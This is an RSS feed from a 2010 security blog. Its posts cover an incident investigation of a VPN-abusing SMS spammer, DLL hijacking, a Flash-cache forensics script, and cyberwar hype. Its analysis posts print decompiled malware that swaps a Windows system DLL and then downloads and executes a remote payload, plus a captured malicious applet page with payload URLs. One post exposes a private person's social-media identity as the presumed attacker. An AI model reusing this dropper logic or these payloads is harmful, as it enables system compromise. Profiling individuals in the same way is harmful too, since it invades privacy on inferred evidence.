<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>cyberwart</title>
	<atom:link href="http://www.cyberwart.com/blog/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.cyberwart.com/blog</link>
	<description>Cyber Warfare Technologies</description>
	<lastBuildDate>Tue, 31 Aug 2010 17:55:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Investigating a Romanian Hacker</title>
		<link>http://www.cyberwart.com/blog/2010/08/31/investigating-a-romanian-hacker/</link>
		<comments>http://www.cyberwart.com/blog/2010/08/31/investigating-a-romanian-hacker/#comments</comments>
		<pubDate>Tue, 31 Aug 2010 17:50:48 +0000</pubDate>
		<dc:creator>mjw</dc:creator>
				<category><![CDATA[]]></category>

		<guid isPermaLink="false">http://www.cyberwart.com/blog/2010/08/31/investigating-a-romanian-hacker/</guid>
		<description><![CDATA[Introduction Beginning on approximately May 18th, 2010 we received an email complaint relating to abuse from an IP address belonging to a network that I monitor. Early on, the FBI was directly involved in the case, so it has been treated with high regard. The compromised IP address belongs to a subnet range used for [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;">
<h2>Introduction</h2>
<p>Beginning on approximately May 18th, 2010 we received an email complaint relating to abuse from an IP address belonging to a network that I monitor.  Early on, the FBI was directly involved in the case, so it has been treated with high regard.  The compromised IP address belongs to a subnet range used for VPN access available to limited users. The account was disabled per standard procedure, but abuse continued. Further investigation suggested the hacker was of Romanian origin and has been using the network to send text message oriented spam since at least May 2010. The hacker continued to abuse the network for an extended period despite having disabled at 10-15 accounts and blocking several network blocks.</p>
<h2>The Case</h2>
<p>This compromise set represents an interesting case study for several reasons. First, the attacker maintained persistent access for several months. This access continued despite a well trained defensive team and a relatively unsophisticated attacker. Second, despite being familiar with SPAM and even having received numerous unsolicited text messages I was relatively unaware of text message spam as business. This attacker was very regimented and deployed numerous text messaging spam techniques and I assume generated reasonable profits. Finally, we spent time investigating this attacker and resulted in pictures of the likely attacker or at least of someone who likely is closely associated with the attacker – despite this information and the involvement of the FBI the attacker is little threatened.</p>
<h3>Initial Reporting</h3>
<p>The initial indicator for this compromise set was an email from a website that provides text messaging services.  We have concerns regarding the overall legitimacy of the business given their primary revenue model appears to be a referral network and sending mass text messages. However, the website owner contacted us because a stolen credit card was used in purchasing their services from an IP address belonging to a network that I monitor.</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati1.png" alt="" /></p>
<p>We initially determined the account was compromised and disabled the user. Unfortunately, the problem resurfaced.</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati2.png" alt="" /></p>
<p>Given that this was a second known incident and that the FBI was involved we decided to dig more into this compromise to ensure the problem was solved and that other instances of the same issue were not continuing undiscovered.</p>
<p>When we examined the logs we again saw that the two incidents were linked by IP address. Upon closer investigation we also discovered the hostname appeared to be the same.</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati3.png" alt="" /></p>
<p>As the incidents were almost certainly linked, we decided to continue our analysis to ensure the problem did not continue to resurface.</p>
<h2>What we&#8217;re seeing</h2>
<p>The attacker is primarily sending text message oriented spam (see next few screenshots).</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati4.png" alt="" /></p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati5.png" alt="" /></p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati6.png" alt="" /></p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati7.png" alt="" /></p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati8.png" alt="" /></p>
<p>The attacker is using numerous tools to send SPAM.  The spam is generally related to Voice and Text messaging services. Email to SMS gateways are spammed. Likewise SIP, Skype, and Yahoo Voice also appear to be abused. We suspect the attacker generates profit by driving telephone calls or text messages as indicated in the SPAM. The attacker is very regimented; generally logging in week days around 3pm EST (approximately 10 pm in Bucharest and sending SPAM throughout the night.</p>
<h2>Other Activity</h2>
<p>In the next screenshot we see the attacker accessing a US based system via FTP. While it may be possible our attacker has legitimate reason to access to this system, it is probably safer to assume this system (69.147.83.173 – an ip owned by Yahoo) is being attacked as well.  This likely significantly increases the legal exposure given that an organizational IP appears to likely be compromising or attempting to compromise a remote web server.</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati9.png" alt="" /></p>
<h2>Who is doing this?</h2>
<p>Next we attempt to identify the attacker by following the various logs and traffic history. We have already observed that all IP addresses appear to originate in Romania. But it is conceivable that the attacker is merely pivoting from another system or compromised account. But let&#8217;s start with the IP address:</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati10.png" alt="" /></p>
<p>Next we look at traffic originating from the compromised vpn account. We see an automated weather beacon query MSN weather for a Romanian area.</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati11.png" alt="" /></p>
<p>Next, we see the user using a Romanian Google portal with a browser set to use the Romanian Character set.</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati12.png" alt="" /></p>
<p>We also see Skype querying a Romanian variant. The combination of a Romanian IP address, Romanian Language settings, a Romanian weather beacon, Romanian Google, and Romanian Skype gives us high confidence that the attacker is in-fact Romanian.</p>
<p>We continue to closely monitor the situation. We disable numerous accounts but continue to observe compromised accounts by IP and by hostname. On July 11<sup>th</sup>, the attacker makes a signifigant mistake by logging into facebook. As shown below this exposes both a facebook user ID and a yahoo email address.</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati13.png" alt="" /></p>
<p>Again seeing the hostname, the Romanian language settings, and the activity being in the right time frame, etc we are confident this is our attacker.</p>
<p>First using the email address we examine the Yahoo profile , which claims to be a 25 year old woman named Ana from Schenectady, New York.</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati14.png" alt="" /></p>
<p>Next we take the Facebook cookie and examined the facebook page to again find a user named Ana.</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati15.png" alt="" /></p>
<p>Logging into facebook we find that Ana is from Bacau, Romania.</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati16.png" alt="" /></p>
<p>A close up picture:</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati17.png" alt="" /></p>
<p>And she might be single….</p>
<p><img src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/083110_1750_Investigati18.png" alt="" /></p>
<p>As you can see from above, she appears to have clicked on a Match.com link.</p>
<h2>Analysis of the Attacker</h2>
<p>With a strong degree of confidence we believe the attacker is the Romanian woman. This is supported by the IP addresses of the attack, browser settings, weather beacons, and the Facebook page. We know the attacker logged in as the Facebook user &#8220;Ana Maria&#8221;. This fact does not necessarily indicate that the Facebook user is the attacker, but the attacker certainly had access to a system with the Facebook credentials for that user. That system is the same system using compromised user accounts and sending text spam for several months. Additionally the user is the Facebook profile is in the expected geographic area. Therefore it seems likely the Facebook user is the attacker or a close associate.</p>
<h2>Mitigations to date</h2>
<p>We made numerous efforts to block this user. We have performed the following remediation activities:</p>
<ul>
<li>Blocked SSL VPN connections from a specified IP range</li>
<li>Created an ACL  to block a specified IP range</li>
<li>Disabled approximately 15 accounts</li>
<li>Throttled login attempts on the SSL VPN</li>
</ul>
<p>Despite these mitigations the attacker was able to maintain access using simple side-steps. She cycled through numerous accounts. When we blocked her IP address she switched to a different range. When we blocked that range, she used another VPN account to log into our VPN.</p>
<h2>Summary</h2>
<p>We have learned several lessons from this on-going case. Foremost is our inability to directly mitigate ongoing attacks. We are extremely limited in the mechanisms we can utilize to prevent determined attackers. This attacker did NOT use sophisticated tools or techniques but has successfully utilized our network despite our efforts to prevent unauthorized use for an extended period. We knew exactly what the attacker was doing, who she was, and had several additional strategies to block her. However, organizational difficulties slowed this process. A key lessoned learned is that we must develop internal communication processes with other groups to ensure that our detection and understanding of an attack can be translated into effective mitigations.  Additionally, as someone who has spent serious time performing penetration tests and writing custom tools, I would have hoped to have fared better against this attacker given that I presume to know her business fairly well. Alas, defense is much harder.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cyberwart.com/blog/2010/08/31/investigating-a-romanian-hacker/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DLL Insecurity</title>
		<link>http://www.cyberwart.com/blog/2010/08/25/dll-insecurity/</link>
		<comments>http://www.cyberwart.com/blog/2010/08/25/dll-insecurity/#comments</comments>
		<pubDate>Wed, 25 Aug 2010 22:05:53 +0000</pubDate>
		<dc:creator>mjw</dc:creator>
				<category><![CDATA[]]></category>

		<guid isPermaLink="false">http://www.cyberwart.com/blog/?p=570</guid>
		<description><![CDATA[There has been much written in regards to the wave of DLL binary hijacking and most of the analysis is very good. However, while trying to explain the vulnerability I&#8217;ve faced two questions over and over: One, why does this affect so many applications, and Two, how might these vulnerabilities be used. In answer to [...]]]></description>
			<content:encoded><![CDATA[<p>There has been much written in regards to the wave of DLL binary hijacking and most of the analysis is very good. However, while trying to explain the vulnerability I&#8217;ve faced two questions over and over: One, why does this affect so many applications, and Two, how might these vulnerabilities be used.</p>
<p>In answer to one, the problems is library architecture problem. Some people have blamed Microsoft for the issue. In particular, I saw MS criticized for including the Current Working Directory (CWD) in the path. Honestly, I can&#8217;t imagine doing otherwise. I&#8217;m pretty sure most applications would fall apart if the CWD wasn&#8217;t included in the path. A few sanity checks would be nice, and this is essentially what MS&#8217;s new registry settings provide. But for me, the problem is that developers are loading libraries without knowing explicitly what they are. Sure this helps out when there are shared libraries, but ultimately you can&#8217;t secure an application if developers don&#8217;t check what they&#8217;re executing. As a development architecture problem across many applications there is now simple fix.</p>
<p>Digging into the problem, I demonstrate it with the following short program:</p>
<p><a rel="attachment wp-att-571" href="http://www.cyberwart.com/blog/2010/08/25/dll-insecurity/2010-08-25_1604/"><img class="aligncenter size-full wp-image-571" title="2010-08-25_1604" src="http://www.cyberwart.com/blog/wp-content/uploads/2010/08/2010-08-25_1604.png" alt="" width="708" height="556" /></a></p>
<p>Microsoft explicitly advises against using SearchPath to help load a library, but developers seem to love doing things like this. If the user browses to a directory to open a media file, the CWD changes, and SearchPath looks there and happily returns a path to a planted malicious DLL.</p>
<p>Two, I haven&#8217;t seen these exploits in the wild. <a href="http://www.exploit-db.com" target="_blank">Exploit-DB </a>is being overwhelmed with POCs but I haven&#8217;t seen realistic attack vectors actually used. With minimal testing here are a few cases that I&#8217;m worried about:</p>
<ul>
<li>A user unknowingly having a writable SMB share to the Internet with media files located on the share. An attacker writes an appropriate, and possibly hidden, DLL to the share. When a user later accesses the media files and is compromised.</li>
<li>A user attempting to download a media file, such as a movie, from a malcious webserver. If the targeted media file is linked correctly via SMB or WebDAV and an appropriate DLL is also in the directory the user may be compromised.</li>
<li>A user to be compromised by a typical client side vector &#8211; downloading a malicious PDF, JAR, or EXE. That malware then downloads various DLLs and hides them in every network share it can find and compromises any network user who opens the targeted files.</li>
</ul>
<p>Numerous applications seem vulnerable such as uTorrent, DivX player, Skype, PowerPoint, etc and users love to click things. There&#8217;s a lot of hype with this old bug, but I expect things could get messy.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cyberwart.com/blog/2010/08/25/dll-insecurity/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Flash &#8220;Cookies&#8221;</title>
		<link>http://www.cyberwart.com/blog/2010/08/23/flash-cookies/</link>
		<comments>http://www.cyberwart.com/blog/2010/08/23/flash-cookies/#comments</comments>
		<pubDate>Tue, 24 Aug 2010 00:21:02 +0000</pubDate>
		<dc:creator>mjw</dc:creator>
				<category><![CDATA[]]></category>

		<guid isPermaLink="false">http://www.cyberwart.com/blog/?p=561</guid>
		<description><![CDATA[Mandiant released/updated their Web History tool recently. It&#8217;s a nice utility but it forgets about an important source of web history data &#8211; Flash &#8220;cookies&#8221;. By cookies I actually mean remnant files and directories related to caching Flash data. They don&#8217;t provide a plethora of data, but it&#8217;s a quick way to determine where users [...]]]></description>
			<content:encoded><![CDATA[<p>Mandiant released/updated their Web History tool recently. It&#8217;s a nice utility but it forgets about an important source of web history data &#8211; Flash &#8220;cookies&#8221;. By cookies I actually mean remnant files and directories related to caching Flash data. They don&#8217;t provide a plethora of data, but it&#8217;s a quick way to determine where users have used flash even after they clear their browser history.</p>
<p>Here&#8217;s a quick hack to dump visited websites from Flash cache files and the timestamps. This works in my exceptionally limited testing, but you should probably use something better than a POC for anything important:</p>
<pre name="code" class="c">

#!/usr/bin/python
# mjw@cyberwart.com
# USAGE: dumpflashhistory.py
# eventually will add optional <-u username>
# NOTES: this is only a quick hack

import os, sys

def get_flashdirs():
    flash_dirs = []
    base_dir = os.getenv('USERPROFILE')
    flash_dirs.append(base_dir + "\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys")
    flash_dirs.append(base_dir + "\\Application Data\\Macromedia\\Flash Player\\#SharedObjects")

    return flash_dirs

def dedupe_sorted(arr):
    last = None
    ret = []
    for x in arr:
        if x != last:
            ret.append(x)
        last = x

    return ret

def get_flash_history(dirs):
    flash_files = []
    flash_dirs = []

    for d in dirs:
        for root, dirs, files in os.walk(d):
            for  dd in dirs:
                if dd.rfind('.', 4) > 0 and dd.find("\ ") < 0 and dd.rfind(".swf", 4) < 0:
                    #dd = dd.replace("#", '')
                    flash_dirs.append(dd + str(os.stat(str(os.path.join(root, dd)))[7:]))

    flash_dirs.sort()
    for x in dedupe_sorted(flash_dirs):
        print x

get_flash_history(get_flashdirs())
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.cyberwart.com/blog/2010/08/23/flash-cookies/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Why &#8220;Cyber War&#8221; hype makes my blood boil</title>
		<link>http://www.cyberwart.com/blog/2010/07/08/why-cyber-war-hype-makes-my-blood-boil/</link>
		<comments>http://www.cyberwart.com/blog/2010/07/08/why-cyber-war-hype-makes-my-blood-boil/#comments</comments>
		<pubDate>Thu, 08 Jul 2010 17:54:39 +0000</pubDate>
		<dc:creator>mjw</dc:creator>
				<category><![CDATA[]]></category>

		<guid isPermaLink="false">http://www.cyberwart.com/blog/?p=547</guid>
		<description><![CDATA[The cyber war debate is raging again. I assume this is because it&#8217;s summer and everyone is bored. There was a recent debate between Bruce Schneier and former NSA director Michael Hayden. Schneier argued that &#8220;Cyber war&#8221; has been grossly over hyped and the general argued that cyber war is a very real threat. Next [...]]]></description>
			<content:encoded><![CDATA[<p>The cyber war debate is raging again. I assume this is because it&#8217;s summer and everyone is bored. There was a recent debate <a href="http://intelligencesquaredus.org/index.php/past-debates/cyber-war-threat-has-been-grossly-exaggerated/">between </a><a href="http://www.schneier.com/blog">Bruce Schneier</a> and former NSA director Michael Hayden. Schneier argued that &#8220;Cyber war&#8221; has been grossly over hyped and the general argued that cyber war is a very real threat.</p>
<p>Next we have have <a href="http://taosecurity.blogspot.com/">Richard Bejtlich</a> arguing that there is cyberwar<a href="http://taosecurity.blogspot.com/2010/07/cyberwar-is-real.html"> here</a> and <a href="http://taosecurity.blogspot.com/2010/07/little-more-on-cyberwar-from-joint-pub.html">here</a>. He even goes on to <a href="http://taosecurity.blogspot.com/2010/07/joint-strike-fighter-face-of-cyberwar.html">argue the Chinese have &#8220;downed&#8221; F-22 fighters</a>. His premise being that because some IP address in China being associated with an Internet compromise of a related defense contractor reported in April, the Chinese government has developed sufficient countermeasures to mitigate the prowess of the F-22 and thus it shouldn&#8217;t be purchased. Likewise not purchasing is apparently equivalent to destroying. He also claims to have special knowledge of the attack. I can only imaging that any special knowledge would be classified and that if he had the knowledge he couldn&#8217;t even reference it. Of course this is only speculation, but if one wants to debate an issue lets talk about verifiable evidence rather than unsubstantiated hyperbole.</p>
<p>Others including Sourcefire have jumped on the bandwagon, and Schneier <a href="http://www.schneier.com/blog/archives/2010/07/the_threat_of_c.html ">posted a blog entry re-articulating his position</a>.</p>
<p>My problem isn&#8217;t with Cyber War &#8211; it&#8217;s with the hyperbole. Every bit of evidence in the public space is consistent with run of the mill criminal activity. Aurora had links back to South Korea and Florida &#8211; as well as China. The infamous CRC code wasn&#8217;t uniquely Chinese. The F22 information compromise wouldn&#8217;t be considered war if a spy had grabbed papers physically &#8211; it would be classic espionage. Why would the medium suddenly change the nature of the event?</p>
<p>It&#8217;s easy say just call *this stuff* &#8220;cyber war&#8221;. I&#8217;m not being resistant to be pedantic. Rather, I think there&#8217;s a level of attack that could escalate well beyond the petty criminal or even espionage. Yes, the electric system is vulnerable. Yes it&#8217;s been speculated that hackers caused a sewage spill (I believe in Australia IIRC). I think these items begin to broach the warfare threshold. For instance, if a computer attack exploited a power system <a href="http://www.cnn.com/2007/US/09/27/power.at.risk/index.html">blew up a generator</a> and caused a cascading power failure &#8211; the destructive impact might be similar to a cruise missile destroying the same target (though that is a wild guess). There would be possible loss of life and massive economic damage. But things could still get worse, imagine if enemy combatants could take control of a Predator and attack US troops; or if they could switch blue (friendly) and red (enemy) forces inside a blue force tracking system. Going crazy with speculative FUD I could even speculate that a determined attacker at a nation state level could hack a common autopilot system and cause it to engage and rapidly decent on landing &#8211; the result being horrific and definitely war like. Because these attacks are conceivable it&#8217;s important to maintain a reasonable threshold for &#8220;cyber war&#8221;. If not we will lack even the basic language to prepare to appropriately defend ourselves.</p>
<p>Again, the above is merely speculative FUD, but it has been my experience that all software is breakable given sufficient time and expertise. Rather than contractors stealing billions from the government in non-sensical products and services that make us no safer  or the NSA eroding our privacy, we should have serious discussions. Computers control huge aspects of life and could be leveraged to serious damage. But &#8220;cyber war&#8221; as currently described only lessens the conversation. The scary thing is that serious professionals are calling this stuff &#8220;war&#8221;, they say we&#8217;re losing (we are), but they think these low level attacks are nation states.</p>
<p>For instance, say I have a military force that needs to be trained. They&#8217;re to support the war on crime in south east DC. South east can be  a very violent place, there&#8217;s lots of crime, lots of armed men, and a high homicide rate. If I train them for &#8220;Crime war&#8221; they will likely be very adapt at that mission. However, if they&#8217;re destined fight a &#8220;war war&#8221; they will likely be entirely unprepared to face (say) the Chinese Army. You can imagine what might happen in those circumstances. I think the same is likely to be the case if we prepare defenses for cyber war by confusing it with cyber crime. Instead of addressing the real threats of cyber war everyone is running around shouting cyber war over weak criminal attacks trying to get sell an inappropriate service or tool.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cyberwart.com/blog/2010/07/08/why-cyber-war-hype-makes-my-blood-boil/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Adobe Acrobat-Flash Payload</title>
		<link>http://www.cyberwart.com/blog/2010/06/09/adobe-acrobat-flash-payload/</link>
		<comments>http://www.cyberwart.com/blog/2010/06/09/adobe-acrobat-flash-payload/#comments</comments>
		<pubDate>Wed, 09 Jun 2010 20:06:58 +0000</pubDate>
		<dc:creator>mjw</dc:creator>
				<category><![CDATA[]]></category>

		<guid isPermaLink="false">http://www.cyberwart.com/blog/?p=541</guid>
		<description><![CDATA[I hate the AV industry. Symantec does a fairly good write up, but they block out the attacking system. This is completely absurd. Every admin needs to know where the payload is going to. Symantec apparently feels you have to be important or pay for the info. Fuck Symantec. Here&#8217;s the main from one of [...]]]></description>
			<content:encoded><![CDATA[<p>I hate the AV industry. Symantec does a <a href="http://www.symantec.com/connect/blogs/analysis-zero-day-exploit-adobe-flash-and-reader">fairly good write up,</a> but they block out the attacking system. This is completely absurd. Every admin needs to know where the payload is going to. Symantec apparently feels you have to be important or pay for the info. Fuck Symantec. Here&#8217;s the main from one of the samples:</p>
<p><code><br />
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)<br />
{<br />
HANDLE v5; // eax@8<br />
HRSRC v6; // esi@10<br />
DWORD v7; // ebp@10<br />
HANDLE v8; // esi@10<br />
const void *v9; // eax@10<br />
HRSRC v10; // esi@10<br />
DWORD v11; // edi@10<br />
HGLOBAL v12; // ebx@10<br />
HANDLE v13; // esi@10<br />
const void *v14; // eax@10<br />
DWORD NumberOfBytesWritten; // [sp+8h] [bp-C68h]@10<br />
HGLOBAL hResData; // [sp+Ch] [bp-C64h]@10<br />
const CHAR ServiceName[4]; // [sp+10h] [bp-C60h]@1<br />
char v18; // [sp+15h] [bp-C5Bh]@1<br />
__int16 v19; // [sp+10Dh] [bp-B63h]@1<br />
char v20; // [sp+10Fh] [bp-B61h]@1<br />
CHAR Buffer; // [sp+110h] [bp-B60h]@1<br />
const CHAR v22[260]; // [sp+214h] [bp-A5Ch]@2<br />
const CHAR ExistingFileName; // [sp+318h] [bp-958h]@3<br />
const CHAR MultiByteStr; // [sp+41Ch] [bp-854h]@2<br />
const CHAR v25; // [sp+520h] [bp-750h]@4<br />
char v26; // [sp+560h] [bp-710h]@4<br />
char v27; // [sp+561h] [bp-70Fh]@4<br />
__int16 v28; // [sp+61Dh] [bp-653h]@4<br />
char v29; // [sp+61Fh] [bp-651h]@4<br />
char v30; // [sp+620h] [bp-650h]@2<br />
const CHAR v31[260]; // [sp+724h] [bp-54Ch]@2<br />
const CHAR CmdLine; // [sp+828h] [bp-448h]@5<br />
struct _WIN32_FIND_DATAA FindFileData; // [sp+928h] [bp-348h]@4<br />
const CHAR FileName; // [sp+A68h] [bp-208h]@3<br />
char NewFileName; // [sp+B6Ch] [bp-104h]@2</code></p>
<p><code>strcpy((char *)ServiceName, "BITS");<br />
memset(&amp;v18, 0, 0xF8u);<br />
v19 = 0;<br />
v20 = 0;<br />
if ( !GetSystemDirectoryA(&amp;Buffer, 0x104u)<br />
|| (sprintf(&amp;NewFileName, "%s\\dllcache\\qmgr.dll", &amp;Buffer),<br />
sprintf((char *)&amp;MultiByteStr, "%s\\qmgr.dll", &amp;Buffer),<br />
sprintf((char *)v22, "%s\\kernel64.dll", &amp;Buffer),<br />
sprintf((char *)v31, "%s\\es.ini", &amp;Buffer),<br />
!GetWindowsDirectoryA(&amp;v30, 0x104u)) )<br />
return -1;<br />
sprintf((char *)&amp;ExistingFileName, "%s\\EventSystem.dll", &amp;v30);<br />
sprintf((char *)&amp;FileName, "%s\\ServicePackFiles\\i386\\qmgr.dll", &amp;v30);<br />
if ( CheckIfLocalAccountIsAdmin() )<br />
{<br />
v5 = FindFirstFileA(&amp;ExistingFileName, &amp;FindFileData);<br />
if ( v5 != (HANDLE)-1 )<br />
{<br />
FindClose(v5);<br />
return -1;<br />
}<br />
NumberOfBytesWritten = 0;<br />
v6 = FindResourceA(0, (LPCSTR)0x65, "SERV_DLL");<br />
v7 = SizeofResource(0, v6);<br />
hResData = LoadResource(0, v6);<br />
v8 = CreateFileA(&amp;ExistingFileName, 0x1F03FFu, 7u, 0, 2u, 0xA0u, 0);<br />
v9 = LockResource(hResData);<br />
WriteFile(v8, v9, v7, &amp;NumberOfBytesWritten, 0);<br />
CloseHandle(v8);<br />
v10 = FindResourceA(0, (LPCSTR)0x66, "SERV_INI");<br />
v11 = SizeofResource(0, v10);<br />
v12 = LoadResource(0, v10);<br />
v13 = CreateFileA(v31, 0x1F03FFu, 7u, 0, 2u, 0xA0u, 0);<br />
v14 = LockResource(v12);<br />
WriteFile(v13, v14, v11, &amp;NumberOfBytesWritten, 0);<br />
CloseHandle(v13);<br />
if ( ManipulateBITSService(ServiceName, 4u) == -1<br />
|| (StopBITS(ServiceName),<br />
Sleep(1u),<br />
DisableWindowsFileProtection(&amp;MultiByteStr),<br />
Sleep(1u),<br />
ReplaceOriginalQMGR_DLLwithEventSystem_DLL(<br />
&amp;NewFileName,<br />
(int)v22,<br />
(int)&amp;MultiByteStr,<br />
&amp;ExistingFileName,<br />
&amp;FileName) == -1)<br />
|| (SetFakeQMGRToOriginalQMGRFiletime((int)&amp;ExistingFileName, v22),<br />
SetFakeQMGRToOriginalQMGRFiletime((int)&amp;MultiByteStr, v22),<br />
SetFakeQMGRToOriginalQMGRFiletime((int)v31, v22),<br />
ManipulateBITSService(ServiceName, 2u) == -1)<br />
|| StartBITS(ServiceName) == -1 )<br />
return -1;<br />
}<br />
else<br />
{<br />
CoInitialize(0);<br />
memcpy((void *)&amp;v25, "hXXp://210.211.31.214/img/xslu.exe", 0x40u);<br />
v26 = aHttp210_211_31[64];<br />
memset(&amp;v27, 0, 0xBCu);<br />
v28 = 0;<br />
v29 = 0;<br />
if ( !GetEnvironmentVariableA("TEMP", (LPSTR)&amp;FindFileData, 0x100u)<br />
|| (sprintf((char *)&amp;CmdLine, "%s\\1yxf.exe", &amp;FindFileData),<br />
DeleteUrlCacheEntry(&amp;v25),<br />
URLDownloadToFileA(0, &amp;v25, &amp;CmdLine, 0, 0))<br />
|| WinExec(&amp;CmdLine, 0) &lt;= 0x1F )<br />
return -1;<br />
}<br />
return 0;<br />
}</code></p>
<p><code> </code><br />
In case you missed it<br />
<strong>hxxp://210.211.31.214/img/xslu.exe</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.cyberwart.com/blog/2010/06/09/adobe-acrobat-flash-payload/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>JDT Malware: Bob&#8217;s Homepage</title>
		<link>http://www.cyberwart.com/blog/2010/05/10/jdt-malware-bobs-homepage/</link>
		<comments>http://www.cyberwart.com/blog/2010/05/10/jdt-malware-bobs-homepage/#comments</comments>
		<pubDate>Mon, 10 May 2010 16:40:10 +0000</pubDate>
		<dc:creator>mjw</dc:creator>
				<category><![CDATA[]]></category>

		<guid isPermaLink="false">http://www.cyberwart.com/blog/2010/05/10/jdt-malware-bobs-homepage/</guid>
		<description><![CDATA[Just a heads up on some IPs we&#8217;re seeing hosting malware: [5/10/10 12:29:31 PM] mjw: 68.168.216.6 is malware [5/10/10 12:29:41 PM] mjw: 82.211.7.32 malware [5/10/10 12:29:46 PM] mjw: 83.169.37.246 malware [5/10/10 12:30:06 PM] mjw: 91.203.133.223 malware [5/10/10 12:30:18 PM] mjw: petwife.ru malware [5/10/10 12:31:02 PM] mjw: 78.41.156.236 malware [5/10/10 12:31:12 PM] mjw: 87.110.220.31 malware [5/10/10 [...]]]></description>
			<content:encoded><![CDATA[<p>Just a heads up on some IPs we&#8217;re seeing hosting malware:</p>
<p>[5/10/10 12:29:31 PM] mjw: 68.168.216.6 is malware<br />
[5/10/10 12:29:41 PM] mjw: 82.211.7.32 malware<br />
[5/10/10 12:29:46 PM] mjw: 83.169.37.246 malware<br />
[5/10/10 12:30:06 PM] mjw: 91.203.133.223 malware<br />
[5/10/10 12:30:18 PM] mjw: petwife.ru malware<br />
[5/10/10 12:31:02 PM] mjw: 78.41.156.236 malware<br />
[5/10/10 12:31:12 PM] mjw: 87.110.220.31 malware<br />
[5/10/10 12:31:16 PM] mjw: prealpole.ru malware<br />
[5/10/10 12:32:04 PM] mjw: 88.191.79.223 malware<br />
[5/10/10 12:32:13 PM] mjw: 188.72.211.253 malware<br />
[5/10/10 12:32:18 PM] mjw: wovenshelf.ru malware</p>
<p>Contents like:</p>
<p>HTTP/1.1 200 OK{D}{A}</p>
<p>Server: nginx{D}{A}</p>
<p>Date: Wed, 05 May 2010 04:00:01 GMT{D}{A}</p>
<p>Content-Type: text/html{D}{A}</p>
<p>Connection: close{D}{A}</p>
<p>Expires: 0{D}{A}</p>
<p>Pragma: no-cache{D}{A}</p>
<p>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0{D}{A}</p>
<p>Cache-Control: private{D}{A}</p>
<p>Content-Length: 1270{D}{A}</p>
<p>{D}{A}</p>
<p> < html >  < head >  < title > Bob&#8217;s Homepage < /title >  < /head >  < body >  < applet width='100%' height='100%' code='JavaFX' archive='Games.jar</p>
<p>' >  < param name='site' VALUE='Njg3NDc0NzAzQTJGMkY3MzcwNjU2QzZDNkM2RjYxNjQyRTcyNzUyRjc3NjU2QzYzNkY2RDY1MkU3MDY4NzAzRjY5NjQzR</p>
<p>DMxMzEyNjcwNjk2NDNEMzIyNjYyMzA=' >  < /applet >  < applet code='quote.GReader.class' archive='NewGames.jar' width='215' height='1</p>
<p>54' >  < param name='data' VALUE='hxxp://spellload.ru/welcome.php?id=9&#038;pid=2&#038;1=1' >  < param name='cc' value='1' >  < /applet >  < script</p>
<p> > {A}</p>
<p>        var u = &#8220;hxxp: -J-jar -J\\\\70.86.147.162\\public\\002.jar none&#8221;;{A}</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cyberwart.com/blog/2010/05/10/jdt-malware-bobs-homepage/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Good Bye Facebook</title>
		<link>http://www.cyberwart.com/blog/2010/05/03/good-bye-facebook/</link>
		<comments>http://www.cyberwart.com/blog/2010/05/03/good-bye-facebook/#comments</comments>
		<pubDate>Mon, 03 May 2010 04:49:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[]]></category>

